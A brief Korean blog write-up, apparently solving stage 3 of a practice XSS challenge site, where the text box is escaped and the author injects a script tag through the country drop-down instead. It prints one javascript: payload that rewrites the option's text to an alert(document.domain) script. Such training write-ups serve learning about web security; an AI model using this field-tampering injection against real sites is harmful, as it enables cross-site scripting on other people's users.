Data+

[XSS Challenges] Stage 3

by Qerogram
힌트

The input in text box is properly escaped. // 텍스트 박스에 넣는 것을 정확히 우회하십시오.


진행과정

[그림 1] 문제

- Stage 2처럼 넣어봤지만 [그림 2]와 같이 실패합니다.


[그림 2]


- 나라 고르는 칸이 있기에 나라 고르는 곳의 값을 삽입하는 코드를 삽입합니다.

javascript:void(document.forms[0].p2.childNodes[1].innerText='<script>alert(document.domain)</script>');


# REF

NULL

'Write Up > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage 2  (0) 2015.10.25
[XSS Challenges] Stage 1  (0) 2015.10.25
0. 시작  (0) 2015.10.25

블로그의 정보

Data+

Qerogram

활동하기